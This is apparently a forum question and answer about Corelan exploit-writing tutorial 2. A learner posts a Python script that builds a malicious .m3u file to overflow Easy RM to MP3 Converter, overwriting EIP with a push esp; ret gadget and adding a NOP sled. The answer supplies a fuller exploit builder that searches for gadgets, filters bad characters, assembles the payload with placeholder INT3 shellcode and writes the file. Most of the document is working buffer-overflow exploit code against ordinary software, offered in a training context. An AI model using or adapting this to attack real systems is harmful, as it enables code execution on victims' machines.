I am working through the Corelan course, but I am stuck on tutorial #2, push ret. I am trying to overwrite my EIP with a push esp, ret so that in this case it lands on my shellcode (calc.exe), but it always gets overwritten with NOPs. I think the code is correct, but I am missing something.
Exploit structure

payload = junk+eip+prependesp+shellcode
#!/usr/bin/env python
import struct

# Popcalc for Easy RM to MP3 Converter
#
# Corelan Exploit Writing Tutorial 2

outfile = 'popcalc_exploit_push_ret.m3u'

# Just some junk at the beginning (bytes literals so the concatenation with
# struct.pack() works on both Python 2 and Python 3)
junk = b'\x41' * 26066

#018757F6 54 PUSH ESP
#018757F7 C3 RETN
eip = struct.pack("<L", 0x018757F6)  # overwrite EIP with push esp, ret (little-endian)

# Some junk so ESP points to shellcode
prependesp = b'B' * 4

# nop sled
shellcode = b'\x90' * 25

# real shellcode (the calc.exe payload) is not included in the post;
# it has to be appended here, otherwise the sled is all that gets executed
shellcode = shellcode

# payload = junk+eip+prependesp+shellcode, written as the .m3u the player opens
payload = junk + eip + prependesp + shellcode
with open(outfile, 'wb') as f:
    f.write(payload)
The result should overwrite EIP with push esp and then launch calc, but it does not work. It always overwrites the place where it stopped.
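The two things worth checking in a push esp; ret exploit are the gadget address (it must really be 54 C3 at that address, and its little-endian bytes must survive the .m3u parser) and the file layout (which offset EIP and then ESP land on). The script below is an added example for Python 3, not the asker's code or Corelan's: it scans a constructed stand-in module image for PUSH ESP; RETN, rejects addresses containing .m3u line terminators, assembles the junk | EIP | pad | NOP sled | shellcode layout from the post, and reports the offsets to compare against the debugger. The module image, its load base (0x01875000) and the four-byte INT3 "shellcode" are all constructed assumptions; the INT3 stand-in is there so that a hit in the debugger proves control reached the sled before the real calc.exe shellcode is dropped in.

```python
import struct

# Constructed stand-in for a loaded module: 0x800 bytes of INT3 filler with a
# PUSH ESP; RETN (0x54 0xC3) planted at offset 0x7F6. With the assumed base
# below the gadget sits at 0x018757F6, the address used in the post. This is
# not an image of the real DLL; it only exercises the search logic.
MODULE_BASE = 0x01875000
_img = bytearray(b"\xcc" * 0x800)
_img[0x7F6:0x7F8] = b"\x54\xc3"
MODULE_IMAGE = bytes(_img)

PUSH_ESP_RET = b"\x54\xc3"        # push esp ; retn
M3U_BAD_CHARS = b"\x00\x0a\x0d"   # NUL / LF / CR cut the line the player reads

# Constructed placeholder shellcode: four INT3s. If control reaches the sled
# the debugger breaks here; swap in the real calc.exe shellcode afterwards.
SHELLCODE = b"\xcc" * 4

JUNK_LEN = 26066   # bytes before the saved return address (from the post)
PAD_LEN = 4        # bytes between EIP and where ESP lands (from the post)
NOP_LEN = 25       # NOP sled length (from the post)


def find_push_esp_ret(image, base, bad_chars=M3U_BAD_CHARS):
    """Return every address of a PUSH ESP; RETN in `image` (loaded at `base`)
    whose little-endian encoding contains none of `bad_chars`."""
    hits = []
    off = image.find(PUSH_ESP_RET)
    while off != -1:
        addr = base + off
        if not any(b in bad_chars for b in struct.pack("<L", addr)):
            hits.append(addr)
        off = image.find(PUSH_ESP_RET, off + 1)
    return hits


def find_bad_chars(data, bad_chars=M3U_BAD_CHARS):
    """Sorted list of bad byte values that occur anywhere in `data`."""
    return sorted({b for b in data if b in bad_chars})


def build_payload(gadget_addr, shellcode,
                  junk_len=JUNK_LEN, pad_len=PAD_LEN, nop_len=NOP_LEN):
    """Assemble junk | EIP | pad | NOP sled | shellcode, the layout from the post."""
    junk = b"A" * junk_len
    eip = struct.pack("<L", gadget_addr)   # little-endian, as the CPU pops it
    pad = b"B" * pad_len
    nops = b"\x90" * nop_len
    return junk + eip + pad + nops + shellcode


def payload_layout(junk_len=JUNK_LEN, pad_len=PAD_LEN, nop_len=NOP_LEN):
    """File offsets of each component, to compare with what the debugger shows
    at EIP and ESP after the crash."""
    eip_off = junk_len
    esp_off = eip_off + 4 + pad_len
    return {"eip": eip_off, "esp": esp_off, "shellcode": esp_off + nop_len}


def write_m3u(path, payload):
    """Write the payload as the .m3u the player opens; returns bytes written."""
    with open(path, "wb") as f:
        f.write(payload)
    return len(payload)


if __name__ == "__main__":
    gadgets = find_push_esp_ret(MODULE_IMAGE, MODULE_BASE)
    print("push esp; ret candidates:", [hex(a) for a in gadgets])
    payload = build_payload(gadgets[0], SHELLCODE)
    print("layout:", payload_layout())
    print("bad chars in payload:", find_bad_chars(payload))
    print("wrote", write_m3u("popcalc_check.m3u", payload), "bytes")
```

Run it against the real module by replacing MODULE_IMAGE and MODULE_BASE with the bytes and load address read from the debugger; any candidate whose address contains 0x00, 0x0A or 0x0D is dropped because the .m3u reader would truncate the line there, which is the same check worth running over the real shellcode before it goes into the file.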